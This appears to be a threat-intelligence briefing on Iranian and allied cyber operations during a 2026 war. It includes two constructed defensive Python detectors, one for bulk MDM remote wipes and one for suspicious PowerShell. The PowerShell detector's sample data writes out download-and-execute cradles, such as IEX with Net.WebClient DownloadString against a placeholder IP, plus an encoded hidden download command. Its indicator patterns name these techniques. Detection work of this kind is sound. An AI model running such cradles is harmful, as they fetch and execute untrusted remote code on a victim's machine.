Executive Summary
Operation Epic Fury entered its 27th day with U.S. and Israeli forces having struck over 10,000 targets and destroyed two-thirds of Iran's military production capacity. Iran's kinetic strike capability has declined approximately 90% from day one of the conflict, but cyber operations have intensified in inverse proportion, with over 60 active threat groups operating (53 on the pro-Iranian side), confirmed MuddyWater pre-positioning in U.S. airport, banking, and software networks, and an unprecedented convergence of Russian and Iranian hacktivist operations [7][10]. The April 6 deadline on U.S. energy infrastructure strikes [17], the wide gap in peace negotiations [19], and the potential entry of Gulf states into the conflict [12] make the next 30 days the highest-risk period for cyber-enabled escalation against U.S. and allied critical infrastructure since the start of the Russia-Ukraine war.
Military and Diplomatic
- Kinetic operations at scale. CENTCOM has flown over 8,000 combat sorties and destroyed 130 Iranian naval vessels, the largest elimination of a navy over three weeks since World War II [1]. Over 10,000 targets have been struck inside Iran. This level of destruction to conventional military capacity is what drives the asymmetric pivot to cyber.
- Systematic leadership decapitation. Iran's intelligence minister Esmaeil Khatib was killed on March 18 [20]. IRGC Navy commander Alireza Tangsiri, who oversaw the Strait of Hormuz blockade, was killed on March 26 [20]. Senior military and nuclear leadership including Shamkhani, Mousavi, and Nasirzadeh were killed in the initial strikes [21]. The killing of the intelligence minister directly impacts MOIS cyber operations command authority.
- IRGC power consolidation. Mojtaba Khamenei was installed as supreme leader on March 9 after IRGC pressure on the Assembly of Experts [4][5]. His first statement called for continued resistance and explicitly threatened to open "other fronts in which the enemy has little experience" [6]. This is assessed with moderate confidence as a reference to expanded cyber and unconventional operations.
- Gulf state posture shift. Saudi Arabia and the UAE, initially opposed to the war, are now considering joining U.S.-Israeli strikes [12]. Their joint statement on March 26 invoked Article 51 self-defense rights after sustained Iranian attacks on their energy infrastructure [12]. A Gulf official flagged "inadequate" U.S. planning for Iranian retaliation as a driver for security partner diversification.
- Strait of Hormuz. The Strait has been effectively closed since late February, with tanker traffic down 70% and over 150 ships stranded [16]. Britain agreed to lead a 22-nation coalition to clear Iranian mines using autonomous mine-hunting drones, the first combat deployment of uncrewed mine clearance. Iran deployed sensor-equipped naval mines and is seeking to codify transit fees as a sovereignty claim [16].
- Diplomatic deadlock. Pakistan-mediated indirect talks produced a 15-point U.S. peace plan that Iran rejected as "extremely maximalist and unreasonable" [19]. Iran demanded war reparations and sovereignty recognition over the Strait [18]. Trump extended the energy strike pause to April 6 [17]. No near-term ceasefire is probable.
- Proxy activation. Iraqi Shia militias (Kataib Hezbollah, Kataib Sayyid al Shuhada, Harakat Hezbollah al Nujaba) formally joined the war [14]. Saraya Awliya al Dam flew a fiber-optic FPV reconnaissance drone inside the U.S. Embassy perimeter in Baghdad [15]. Houthis declared readiness to enter the war with "fingers on the trigger" but have so far held back in what reporting indicates is a coordinated Iranian decision [13][20]. Hezbollah launched rocket attacks against Israel within days of the Israeli ground invasion of southern Lebanon on March 17 [20].
Cyber Operations
- Threat group volume. Security researchers tracked over 60 active threat groups aligned with the conflict, with 53 operating on the pro-Iranian side [7]. This is the largest coordinated cyber campaign environment since the start of the Russia-Ukraine war.
- Electronic Operations Room. Iran established a coordination structure called the Electronic Operations Room on February 28, 2026, to synchronize state-aligned cyber operations [7]. Handala Hack, linked to Iran's MOIS, blends data exfiltration with operations against the Israeli defense establishment [7].
- MuddyWater pre-positioning in U.S. networks. Symantec and Carbon Black identified MuddyWater (Operation Olalampo) in networks of a U.S. airport, a bank, and a software firm with ties to Israel [10]. This represents latent destructive capability that could be activated at any point. TTPs overlap with the separately tracked RedKitten campaign, indicating coordinated infrastructure [10].
- Novel attack types. Handala Hack compromised Stryker's Microsoft Intune global administrator account and used MDM remote wipe to factory-reset over 200,000 systems across 79 countries [8]. Iran targeted AWS data centers in the UAE and Bahrain with a kinetic-cyber hybrid: Shahed drones caused fires that triggered fire suppression water damage, taking two AWS availability zones offline simultaneously and cascading across banking, government, and consumer services for days [8]. Both represent TTPs that have no precedent at this scale.
- Cybercrime surge. Akamai reported a 245% increase in cybercrime since the war started, with banking and fintech accounting for 40% of malicious traffic. Iran's military command explicitly designated U.S. and Israeli-linked banks as military targets [11].
- DHS/CISA alerting gap. As of the reporting period, DHS had not issued any formal alert regarding Operation Epic Fury's cybersecurity impact. This gap is occurring while CISA has lost roughly a third of its workforce and operates without permanent leadership.
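The Stryker incident above turns on two facts an MDM audit log records: which account issued each remote wipe, and how many wipes that account issued in how short a time. The following is an added example, not code from this report, from Stryker, or from any vendor, of the detection logic a defender would run over an MDM audit export to catch both conditions at once: a wipe issued by any account outside a break-glass allowlist, and a burst of wipes by a single actor (break-glass or not) inside a short window. The four-column CSV schema, the account names, the thresholds and the log lines are all constructed for this example; Intune, Jamf and Workspace ONE audit exports use their own field names and would need to be mapped onto these columns first.

```python
from collections import defaultdict, deque
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

# Constructed sample audit log in a simplified, hypothetical four-column CSV
# schema: timestamp, actor, operation, device. Real MDM audit exports use
# their own field names; map them onto these columns before running this.
SAMPLE_AUDIT_LOG = """\
2026-03-20T02:00:05Z,helpdesk@example.test,syncDevice,DEV-0001
2026-03-20T02:14:10Z,helpdesk@example.test,retire,DEV-0017
2026-03-20T03:01:00Z,ga-admin@example.test,wipe,DEV-1001
2026-03-20T03:01:02Z,ga-admin@example.test,wipe,DEV-1002
2026-03-20T03:01:03Z,ga-admin@example.test,wipe,DEV-1003
2026-03-20T03:01:05Z,ga-admin@example.test,wipe,DEV-1004
2026-03-20T03:01:06Z,ga-admin@example.test,wipe,DEV-1005
2026-03-20T03:01:09Z,ga-admin@example.test,wipe,DEV-1006
2026-03-20T09:30:00Z,breakglass-01@example.test,wipe,DEV-2200
"""

# Hypothetical allowlist: the only identities permitted to issue a remote wipe.
BREAK_GLASS_ACCOUNTS = {"breakglass-01@example.test", "breakglass-02@example.test"}
BULK_THRESHOLD = 5                    # this many wipes by one actor ...
BULK_WINDOW = timedelta(minutes=10)   # ... inside this window is a bulk wipe


@dataclass(frozen=True)
class AuditEvent:
    when: datetime
    actor: str
    operation: str
    device: str


@dataclass(frozen=True)
class Alert:
    kind: str      # "unauthorized_wipe" or "bulk_wipe"
    actor: str
    detail: str


def parse_event(line: str) -> AuditEvent:
    """Parse one CSV line of the constructed schema into an AuditEvent."""
    ts, actor, op, device = line.strip().split(",")
    when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return AuditEvent(when, actor.lower(), op, device)


def detect_wipe_abuse(log_text: str, break_glass=BREAK_GLASS_ACCOUNTS,
                      threshold: int = BULK_THRESHOLD,
                      window: timedelta = BULK_WINDOW) -> list:
    """Return alerts for wipes by non-break-glass accounts and for bulk wipes.

    The unauthorized-wipe alert fires once per offending actor; the bulk alert
    fires when an actor's wipe count inside the sliding window reaches the
    threshold, and applies to break-glass accounts too, since a compromised
    break-glass account is exactly the Stryker scenario.
    """
    events = sorted((parse_event(l) for l in log_text.splitlines() if l.strip()),
                    key=lambda e: e.when)
    alerts = []
    flagged_actors = set()
    recent = defaultdict(deque)   # actor -> timestamps of wipes inside the window
    for ev in events:
        if ev.operation != "wipe":
            continue
        if ev.actor not in break_glass and ev.actor not in flagged_actors:
            flagged_actors.add(ev.actor)
            alerts.append(Alert("unauthorized_wipe", ev.actor,
                                f"wipe of {ev.device} at {ev.when.isoformat()} "
                                "by an account outside the break-glass allowlist"))
        q = recent[ev.actor]
        q.append(ev.when)
        while q and ev.when - q[0] > window:   # drop wipes older than the window
            q.popleft()
        if len(q) == threshold:                 # fire once when the burst crosses it
            alerts.append(Alert("bulk_wipe", ev.actor,
                                f"{threshold} wipes within {window} ending "
                                f"{ev.when.isoformat()}"))
    return alerts


if __name__ == "__main__":
    for a in detect_wipe_abuse(SAMPLE_AUDIT_LOG):
        print(f"{a.kind:18} {a.actor:28} {a.detail}")
```

Run as a script it prints two alerts for the sample log, both against the constructed global-admin account, and nothing for the break-glass wipe. A real deployment would feed it the audit export on a schedule and page on either alert kind; set the bulk threshold below the number of devices your help desk legitimately wipes in ten minutes, which for most organisations is in the low single digits.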
Economic and Supply Chain
- Energy market disruption. The Strait of Hormuz closure has produced the largest disruption to global energy supply since the 1970s energy crisis [16]. Brent crude surged past $100/barrel, peaking at $126 [16]. Iran selectively permits transit for ships linked to India, China, Russia, and other non-adversary states, creating a two-tier passage regime [17].
- Cloud infrastructure vulnerability. The AWS kinetic-cyber hybrid attack in the UAE demonstrated that physical attacks on cloud data centers can cascade into regional digital infrastructure failures [8]. Gulf states' rapid digitization under programs like Saudi Vision 2030 and UAE smart city initiatives means this single point of failure affects banking, government services, and logistics simultaneously.
- Sanctions evasion under war conditions. The 245% cybercrime surge and Iran's explicit targeting of financial institutions [11] are consistent with the standing baseline assessment that sanctions pressure drives IRGC-affiliated actors toward revenue-generating cyber operations.
Russian-Iranian Hacktivist Convergence
- Evidence of collaboration: On March 2, pro-Russian political hacktivist group NoName057(16) teamed up with Iranian hacktivists to target Israeli defense and municipal organizations, including defense contractor Elbit Systems [9]. On March 3, pro-Russian hacktivist clusters formally joined the pro-Iran coalition, dividing their operational focus between Europe and the Middle East [9]. Unit 42 assessed that pro-Russian hacktivists are "effectively expanding the Middle East's attack surface" and potentially exposing regional infrastructure to high-disruption tactics previously used against NATO and European interests [7].
- Domains: Cyber (DDoS, website defacement, data exfiltration), information operations.
- Implications for CENTCOM: This convergence means that Gulf state and Israeli defenders now face the combined TTP repertoire of both Russian and Iranian hacktivist ecosystems. NoName057(16) brings automated DDoS tooling (DDoSia) and target selection methodology refined against NATO targets. The collaboration also creates attribution complexity that may slow defensive response.
- Confidence: High. Multiple independent sources document the coordination.
- Sources: [7], [9]
IRGC-Iraqi Militia Operational Coordination
- Evidence of collaboration: Kataib Hezbollah, Kataib Sayyid al Shuhada, and Harakat Hezbollah al Nujaba formally announced joining the war [14]. Attacks from Iraqi territory by Iran-backed militias were a specific grievance in the Gulf states' March 26 joint statement [12]. A fiber-optic FPV drone, assessed as an Iranian technology transfer, was flown inside the U.S. Embassy perimeter in Baghdad by Saraya Awliya al Dam [15].
- Domains: Military (drone attacks, ISR), technology transfer, and by extension cyber-enabled reconnaissance against U.S. installations in Iraq.
- Implications for CENTCOM: The fiber-optic FPV drone technology is significant because it defeats electronic warfare jamming, meaning U.S. force protection measures at Iraqi installations face a capability gap [15]. Iraqi militia entry also increases the threat to U.S. military logistics and communications networks in the Iraq theater.
- Confidence: High. Multiple sources confirm militia activation and technology transfer.
- Sources: [12], [14], [15]
Iranian-Houthi Calculated Restraint
- Evidence of collaboration: The Stimson Center assessed that the Houthi decision to remain on the sideline is a "calculated choice that has been fully coordinated with the Iranians" [13]. Houthi leader Abdul Malik al-Houthi declared readiness to enter with "fingers on the trigger" [20]. The Houthis are assessed as the "least damaged Axis member" and best positioned to help Tehran [13].
- Domains: Military (potential Red Sea/Bab el-Mandeb escalation), maritime.
- Implications for CENTCOM: Houthi activation is being held in reserve as a strategic escalation option. If activated, it would force CENTCOM to divert naval assets, weakening cyber-physical defense of Gulf infrastructure. Houthi-aligned cyber groups have previously targeted maritime tracking and logistics systems.
- Confidence: Moderate. The coordination is assessed, not directly observed.
- Sources: [13], [20]
Operational Implications
- U.S. financial sector is a declared target. Iran's military command publicly named U.S. banks as military targets [11]. MuddyWater has confirmed pre-positioned access in at least one U.S. bank [10]. Combined with a 245% cybercrime surge where banking/fintech accounts for 40% of malicious traffic, the U.S. financial sector faces the highest state-directed cyber threat since the 2012-2013 DDoS campaign. Defenders in this sector should treat the threat as active, not prospective.
- MDM and cloud infrastructure are now validated attack vectors. The Stryker Intune compromise (200,000+ devices wiped) [8] and the AWS kinetic-cyber hybrid attack [8] are novel TTPs that most organizations have not planned for. Any organization using cloud-based MDM or relying on Gulf-region cloud availability zones should reassess their resilience.
- The DHS/CISA alerting gap creates a defensive blind spot. No formal federal alert has been issued for the cyber dimensions of Operation Epic Fury. Defenders cannot wait for federal guidance. Private sector threat intelligence (Unit 42, Halcyon, SOCRadar) is currently the primary source of actionable indicators.
- April 6 is the next critical escalation trigger. If Trump's energy strike pause expires without a deal, resumption of strikes on Iranian energy infrastructure will almost certainly trigger retaliatory cyber operations against U.S. and allied energy networks [17]. Energy sector defenders should prepare now.
- The 22-nation Hormuz coalition creates new attack surface. Joint planning between CENTCOM and coalition partners introduces complex communications and intelligence-sharing requirements. Iranian signals intelligence and cyber espionage units will almost certainly target coalition coordination networks.
Sources: [8], [10], [11], [17]
Outlook
The April 6 deadline on U.S. energy strikes is the single most important variable for the next 30 days [17]. If strikes resume, we assess with high confidence that Iranian cyber operations against U.S. energy infrastructure will escalate, likely involving destructive wiper operations consistent with historical precedents (Shamoon, ZeroCleare). Gulf state entry into the conflict, which reporting indicates is under active consideration [12], would significantly expand the cyber attack surface and could trigger Iranian cyber retaliation against Saudi and Emirati financial, energy, and government networks. The Houthi "fingers on the trigger" posture [20] represents the most consequential uncommitted escalation option; activation would stretch CENTCOM resources and open a new cyber-kinetic front in the Red Sea.
Sources: [12], [17], [20]
Red Sheep Assessment
Assessment: Iran is winning the cyber war while losing the kinetic one, and the structural conditions favor this continuing.
Confidence: High.
The sources collectively paint a picture that isn't being stated plainly: Iran's 90% kinetic degradation has not produced a 90% reduction in its capacity to impose costs. The opposite has occurred. The cyber domain is delivering strategic effects (Stryker wiper, AWS hybrid attack, 245% cybercrime surge, pre-positioned access in U.S. critical infrastructure) that are disproportionate to the resources required [8][10]. The Electronic Operations Room coordination structure [7] and the Russian hacktivist convergence [9] give Iran something its conventional military never had: scalable, deniable, coalition-supported offensive capacity.
The contrarian interpretation worth considering: the systematic killing of Iran's intelligence minister and military leadership [20][21] may not degrade cyber operations at all. It may accelerate them. Iranian cyber units (MOIS and IRGC-affiliated) operate with significant autonomy already. Removing the command layer that might exercise restraint, while leaving the technical operators intact, could produce more aggressive and less predictable operations. The IRGC's consolidation of power under a figurehead supreme leader [4][5] reinforces this dynamic.
The most alarming structural gap is the absence of a federal defensive posture matching the threat. DHS hasn't issued an alert. CISA is understaffed. The private sector is producing the actionable intelligence. This means the U.S. is fighting a multi-domain war where the cyber defense of the homeland is effectively being coordinated by commercial vendors rather than a government agency. For defenders, this means: don't wait for official guidance; it probably isn't coming in time.
Defender's Checklist
- [ ] Audit all MDM administrator accounts immediately. The Stryker/Intune attack [8] exploited a global admin credential. Review conditional access policies, enforce phishing-resistant MFA on all MDM admin accounts (Intune, Workspace ONE, Jamf), and restrict remote wipe permissions to break-glass accounts with hardware token requirements.
- [ ] Hunt for MuddyWater indicators in U.S. networks. Review Halcyon's Operation Olalampo and RedKitten reporting [10] for IOCs. Prioritize hunting in aviation, banking, and software/SaaS environments. Search for anomalous PowerShell execution, DLL side-loading, and tunneling activity to known MuddyWater C2 patterns.
- [ ] Validate cloud region failover for Gulf-dependent services. If your organization uses AWS me-south-1 (Bahrain) or me-central-1 (UAE), confirm that failover to non-Gulf regions functions correctly [8]. Test backup activation procedures. The AWS hybrid attack demonstrated that dual availability zone failure in a single region can cascade.
- [ ] Financial sector: elevate to wartime monitoring posture. Iran has explicitly named U.S. banks as military targets [11]. Coordinate with FS-ISAC for current threat briefings. Increase monitoring on web application firewalls for volumetric attacks and watch for credential harvesting campaigns targeting bank employee portals, consistent with the 40% banking/fintech share of malicious traffic.
- [ ] Monitor NoName057(16) DDoSia tooling targeting lists. The Russian-Iranian hacktivist convergence [9] means DDoSia target lists, which are publicly tracked by researchers, may now include CENTCOM-region organizations. Check if your domains or IPs appear on recent target configurations and pre-position DDoS mitigation.
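The hunting item in the checklist names anomalous PowerShell execution as a starting point. As an added example (not code from this report, from Halcyon, or from any other source cited here), the following is a small scorer for PowerShell script-block log text of the kind Event ID 4104 records: it matches generic tradecraft indicators (encoded commands, download cradles, Invoke-Expression, hidden windows, execution-policy bypass, reflective loading), decodes a base64 UTF-16LE -EncodedCommand payload and rescans the decoded text, and returns the blocks whose weighted score crosses a threshold. The indicators are generic, publicly documented PowerShell heuristics, not MuddyWater-specific IOCs, which this report leaves to [10]; the host names, sample blocks, weights and threshold are all constructed.

```python
import base64
import re
from dataclasses import dataclass

# Pattern for -EncodedCommand and its abbreviations; the group captures the
# base64 payload so it can be decoded and rescanned.
ENCODED_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})",
                        re.IGNORECASE)

# (indicator name, regex, weight). Generic PowerShell tradecraft heuristics,
# not a vendor IOC list; weights are constructed and should be tuned locally.
INDICATORS = [
    ("encoded_command", ENCODED_RE.pattern, 3),
    ("download_cradle",
     r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|Start-BitsTransfer", 2),
    ("invoke_expression", r"\b(?:IEX|Invoke-Expression)\b", 2),
    ("reflective_load", r"\[System\.Reflection\.Assembly\]::Load|FromBase64String", 2),
    ("hidden_window", r"-(?:w|win|windowstyle)\s+hidden", 1),
    ("policy_bypass", r"-(?:ep|executionpolicy)\s+bypass", 1),
    ("no_profile", r"-(?:nop|noprofile)\b", 1),
]
COMPILED = [(name, re.compile(pat, re.IGNORECASE), w) for name, pat, w in INDICATORS]
WEIGHTS = {name: w for name, _, w in INDICATORS}
ALERT_THRESHOLD = 3   # a single weak indicator alone never reaches this

# Constructed sample: (host, script block text) pairs in the style of the
# ScriptBlockText field of Event ID 4104 records. The encoded payload is built
# here so the sample stays self-contained; the URL is a documentation address.
_ENCODED = base64.b64encode(
    "Invoke-WebRequest http://203.0.113.9/x.txt -OutFile $env:TEMP\\x.txt".encode("utf-16le")
).decode("ascii")
SAMPLE_SCRIPT_BLOCKS = [
    ("ws-0142", "Get-ChildItem C:\\Users\\alice\\Documents -Recurse | Measure-Object"),
    ("ws-0142", "Import-Module ActiveDirectory; Get-ADUser -Filter * -Properties mail "
                "| Export-Csv users.csv"),
    ("ws-0377", "powershell.exe -nop -w hidden -ExecutionPolicy Bypass -EncodedCommand "
                + _ENCODED),
    ("srv-db01", "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/u.ps1')"),
]


@dataclass(frozen=True)
class Finding:
    host: str
    score: int
    indicators: tuple   # indicator names; "decoded:" prefix = found in the decoded payload
    decoded: str        # decoded -EncodedCommand payload, or "" if none


def decode_encoded_command(text: str) -> str:
    """Return the decoded UTF-16LE payload of an -EncodedCommand, or "" if absent/invalid."""
    m = ENCODED_RE.search(text)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except ValueError:      # bad base64 padding or not valid UTF-16LE
        return ""


def analyze_block(host: str, text: str) -> Finding:
    """Score one script block: match indicators on the raw text and on the decoded payload."""
    found = {name for name, rx, _ in COMPILED if rx.search(text)}
    decoded = decode_encoded_command(text)
    if decoded:
        found |= {"decoded:" + name for name, rx, _ in COMPILED if rx.search(decoded)}
    score = sum(WEIGHTS[n.split(":", 1)[-1]] for n in found)
    return Finding(host, score, tuple(sorted(found)), decoded)


def hunt(blocks, threshold: int = ALERT_THRESHOLD) -> list:
    """Return findings at or above the threshold, highest score first."""
    findings = (analyze_block(h, t) for h, t in blocks)
    return sorted((f for f in findings if f.score >= threshold),
                  key=lambda f: f.score, reverse=True)


if __name__ == "__main__":
    for f in hunt(SAMPLE_SCRIPT_BLOCKS):
        print(f"{f.host:10} score={f.score:2} {', '.join(f.indicators)}")
        if f.decoded:
            print(f"{'':10} decoded: {f.decoded}")
```

The sample deliberately includes a benign directory listing and an AD export that match nothing, which is the point of weighting: -NoProfile on its own should not page anyone, while an encoded command that unwraps to a download cradle should rank at the top. Tune the weights and threshold against your own baseline of administrative scripts before trusting the ranking, and treat the decoded payload as the artifact to pivot on.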
Visual Intelligence
Graphics not reproduced in this text: Timeline (13 events); Entity Graph (22 entities, 64 relationships); Diamond Model.
Sources
- [1] "CENTCOM commander gives video update as war enters fourth week" - Stars and Stripes, https://www.stripes.com/theaters/middle_east/2026-03-21/centcom-cooper-iran-update-day-22-21139708.html
- [2] "2026 Iranian strikes on the United Arab Emirates" - Wikipedia, https://en.wikipedia.org/wiki/2026_Iranian_strikes_on_the_United_Arab_Emirates
- [3] "Iran Update Evening Special Report: March 2, 2026" - Critical Threats, https://www.criticalthreats.org/analysis/iran-update-evening-special-report-march-2-2026
- [4] "2026 Iranian supreme leader election" - Wikipedia, https://en.wikipedia.org/wiki/2026_Iranian_Supreme_Leader_election
- [5] "The New Khamenei" - Foreign Affairs, https://www.foreignaffairs.com/iran/new-khamenei
- [6] "Iran's Mojtaba Khamenei vows to fight in first statement as supreme leader" - Al Jazeera, https://www.aljazeera.com/news/2026/3/12/irans-mojtaba-khamenei-issues-first-statement-as-supreme-leader-amid-war
- [7] "Threat Brief: March 2026 Escalation of Cyber Risk Related to Iran (Updated March 26)" - Palo Alto Unit 42, https://unit42.paloaltonetworks.com/iranian-cyberattacks-2026/
- [8] "2026 Iran War: The Complete Timeline of Every Major Cyber Attack" - The CyberSec Guru, https://thecybersecguru.com/news/2026-iran-war-complete-cyber-attack-timeline/
- [9] "Russia-linked hackers appear on Iran war's cyber front, but their impact is murky" - Nextgov/FCW, https://www.nextgov.com/cybersecurity/2026/03/russia-linked-hackers-appear-iran-wars-cyber-front-their-impact-murky/412011/
- [10] "Iranian Use of Cybercriminal Tactics in Destructive Cyber Attacks: 2026 Updates" - Halcyon, https://www.halcyon.ai/ransomware-alerts/iranian-use-of-cybercriminal-tactics-in-destructive-cyber-attacks-2026-updates
- [11] "Iran names US banks as targets, ratcheting up cyber threat" - American Banker, https://www.americanbanker.com/news/iran-names-u-s-banks-as-targets-ratcheting-up-cyber-threat
- [12] "Gulf states say they're ready for 'self defense' as stance shifts on Iran war" - CNBC, https://www.cnbc.com/2026/03/26/gulf-states-ready-for-self-defense-against-iran-as-war-stance-shifts.html
- [13] "The Houthis Must Decide: Join Iran's War Against the US and Israel or Abandon Iran" - Stimson Center, https://www.stimson.org/2026/the-houthis-must-decide-join-irans-war-against-the-us-and-israel-or-abandon-iran/
- [14] "Iraqi Shiite militias join the war between Israel, the United States, and Iran with drone attacks" - FDD's Long War Journal, https://www.longwarjournal.org/archives/2026/03/iraqi-shiite-militias-join-the-war-between-israel-the-united-states-and-iran-with-drone-attacks.php
- [15] "Iran Update, March 25, 2026" - Critical Threats, https://www.criticalthreats.org/analysis/iran-update-march-25-2026
- [16] "2026 Strait of Hormuz crisis" - Wikipedia, https://en.wikipedia.org/wiki/2026_Strait_of_Hormuz_crisis
- [17] "Day 27 of Middle East conflict: US extends pause on Iran energy strikes" - CNN, https://www.cnn.com/2026/03/26/world/live-news/iran-war-us-israel-trump
- [18] "Trump grants Iran another extension on a deadline to reopen the Strait of Hormuz" - NPR, https://www.npr.org/2026/03/26/nx-s1-5761882/iran-war-peace-conditions
- [19] "Iran calls US proposal to end war 'maximalist, unreasonable'" - Al Jazeera, https://www.aljazeera.com/news/2026/3/25/iran-calls-us-proposal-to-end-war-maximalist-unreasonable
- [20] "2026 Iran war" - Wikipedia, https://en.wikipedia.org/wiki/2026_Iran_war
- [21] "Map shows how 22 days of attacks have evolved in US-Israel war on Iran" - Al Jazeera, https://www.aljazeera.com/news/2026/3/16/map-shows-how-16-days-of-attacks-have-evolved-in-us-israel-war-on-iran
- [22] "Resecurity warns that Iran war enters multi-domain phase as cyber and kinetic operations converge" - Industrial Cyber, https://industrialcyber.co/critical-infrastructure/resecurity-warns-that-iran-war-enters-multi-domain-phase-as-cyber-and-kinetic-operations-converge/
- [23] "Analysis: Why Trump's Gulf allies are resisting pressure to join the Iran war" - CNN, https://www.cnn.com/2026/03/12/middleeast/trump-gulf-allies-resisting-iran-war-intl